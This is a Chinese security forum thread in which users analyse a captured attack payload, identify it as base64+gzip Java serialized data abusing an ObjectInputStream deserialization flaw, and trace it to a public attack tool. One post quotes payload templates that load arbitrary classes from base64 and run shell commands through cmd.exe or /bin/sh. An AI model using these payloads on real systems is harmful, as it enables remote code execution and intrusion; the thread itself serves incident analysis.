能力值:
( LV9,RANK:140 )
|
-
-
2 楼
base64+gzip
|
能力值:
( LV2,RANK:10 )
|
-
-
3 楼
oacia
base64+gzip 居然还真就是
最后于 2023-9-7 19:33
被微启宇编辑
,原因:
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
利用的ObjectInputStream反序列化漏洞,多半是你们业务里哪里用了ObjectInputStream然后没做过滤直接就塞进去反序列化了
|
能力值:
( LV2,RANK:10 )
|
-
-
5 楼
找了一圈应该是用的这个工具自动攻击的,这个利用数据里有个TestEcho我搜了一圈应该是下面这个项目 https://github.dev/0x727/DropLabTools
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
private final String anyCodeExecute="var codes=java.util.Base64.getDecoder().decode(\"%s\");var clazz = java.lang.Class.forName(\"java.lang.ClassLoader\");var method = java.lang.ClassLoader.class.getDeclaredMethod(\"defineClass\", Java.type('byte[]').class,Java.type('int').class, Java.type('int').class);method.setAccessible(true);var TestClass = method.invoke(java.lang.ClassLoader.getSystemClassLoader(),codes,0,codes.length);TestClass.newInstance();"; private final String cmdExecuteWin="var str=\"%s\";var ss=str.split(\" \");s=[ss.length+2];s[0]='C:\\\\Windows\\\\system32\\\\cmd.exe';s[1]='/c';for(var i=0;i<ss.length;i++){s[i+2]=ss[i];}var process=java.lang.Runtime.getRuntime().exec(s);process.waitFor();"; private final String cmdExecuteLinux="var str=\"%s\";var ss=str.split(\" \");s=[ss.length+2];s[0]='/bin/sh';s[1]='-c';for(var i=0;i<ss.length;i++){s[i+2]=ss[i];}var process=java.lang.Runtime.getRuntime().exec(s);process.waitFor();";
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
微启宇
oacia
base64+gzip 居然还真就是
我打开这个decode 文件,还有一些 NUL、BEL 啥的乱七八糟的字符,这个是啥意思啊
|
能力值:
( LV2,RANK:10 )
|
-
-
8 楼
EX呵呵
利用的ObjectInputStream反序列化漏洞,多半是你们业务里哪里用了ObjectInputStream然后没做过滤直接就塞进去反序列化了
我顺着思路再看看
|
能力值:
( LV2,RANK:10 )
|
-
-
9 楼
EX呵呵
利用的ObjectInputStream反序列化漏洞,多半是你们业务里哪里用了ObjectInputStream然后没做过滤直接就塞进去反序列化了
应该是这个漏洞:“https://github.com/ibaiw/2023Hvv/blob/main/%E5%B8%86%E8%BD%AFchannel%E5%BA%8F%E5%88%97%E5%8C%96.md”
|
能力值:
( LV2,RANK:10 )
|
-
-
10 楼
疯帅
我打开这个decode 文件,还有一些 NUL、BEL 啥的乱七八糟的字符,这个是啥意思啊
~ file decode decode: Java serialization data, version 5 这个文件是java序列化数据。
|
能力值:
( LV2,RANK:10 )
|
-
-
11 楼
微启宇
~ file decode
decode: Java serialization data, version 5
这个文件是java序列化数据。
这样啊,那估计是什么工具默认生成的。
|
|
|